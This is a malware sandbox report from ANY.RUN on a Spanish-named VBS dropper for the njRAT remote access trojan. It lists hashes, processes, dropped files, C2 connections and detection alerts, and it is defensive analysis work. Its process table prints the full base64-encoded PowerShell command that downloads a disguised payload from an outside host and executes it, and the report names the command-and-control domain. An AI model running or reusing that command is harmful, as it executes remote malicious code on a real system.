analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Detalles Del Pago En Linea.vbs

Full analysis: https://app.any.run/tasks/fb8f7315-701d-44d1-a5ad-5f94f4a1defd
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Malware Trends Tracker     >>>
Analysis date: January 17, 2020, 17:20:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
njrat
bladabindi
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

9A24AB2C46B3D1ED7A6D318FB8493BD5

SHA1:

85D2B35C3E3E52FC18E54078CB638F3B028EE5A6

SHA256:

60DD6B4D5182A2CBE61D6063DAD8A03D77FFEE809BE9AA6B78C3811DD52E3A32

SSDEEP:

12:sJEqPhy8yudqZM81uuzkw/cwIDR+xTcWmCfLVUw++RzivqrEO:sJEqPYudqZM8QuznEP9+xgCTiFuyqrEO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Writes to a start menu file

      • WScript.exe (PID: 944)

    • NJRAT was detected

      • powershell.exe (PID: 2852)

    • Connects to CnC server

      • powershell.exe (PID: 2852)

  • SUSPICIOUS

    • Executes PowerShell scripts

      • WScript.exe (PID: 944)

    • Creates files in the user directory

      • WScript.exe (PID: 944)
      • powershell.exe (PID: 2852)

    • Connects to unusual port

      • powershell.exe (PID: 2852)

  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 2852)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe #NJRAT powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
944"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Detalles Del Pago En Linea.vbs"C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2852"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -enc JABoAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABNAHMAeABtAGwAMgAuAFgATQBMAEgAVABUAFAAOwAkAGgALgBvAHAAZQBuACgAJwBHAEUAVAAnACwAJwBoAHQAdABwAHMAOgAvAC8AbAAuAHQAbwBwADQAdABvAHAALgBpAG8ALwBwAF8AMQA0ADcANAAxAGgAdABrAGQAMQAuAGoAcABnACcALAAkAGYAYQBsAHMAZQApADsAJABoAC4AcwBlAG4AZAAoACkAOwBpAGUAeAAgACQAaAAuAHIAZQBzAHAAbwBuAHMAZQBUAGUAeAB0AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
454
Read events
358
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8WGEQ2LAEDJV7DIF9ML8.temp
MD5:
SHA256:
2852powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\uploadcode[1].jpgtext
MD5:624BE57CAC8C3983E261CDA093B95269
SHA256:1E91A032783B2236EE990939CB6466DF0BE00B696AFBC8E003BA21063172ABF4
944WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.vbstext
MD5:9A24AB2C46B3D1ED7A6D318FB8493BD5
SHA256:60DD6B4D5182A2CBE61D6063DAD8A03D77FFEE809BE9AA6B78C3811DD52E3A32
2852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a766.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@top4top[1].txttext
MD5:302F9C31D039AC834DC8276057A3FBFC
SHA256:19984C2946D8121DF3A02F93BFB72DBC732AE21492E6B132195AB55ABFC8E6A6
2852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2852
powershell.exe
46.246.4.81:2021
chormevb.duckdns.org
Portlane AB
SE
malicious
2852
powershell.exe
51.15.189.129:443
l.top4top.io
Online S.a.s.
FR
unknown

DNS requests

Domain
IP
Reputation
l.top4top.io
  • 51.15.189.129
whitelisted
chormevb.duckdns.org
  • 46.246.4.81
malicious

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2852
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] njRAT/Bladabindi
2852
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] njRAT.Gen RAT outbound connection
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Detalles Del Pago En Linea.vbs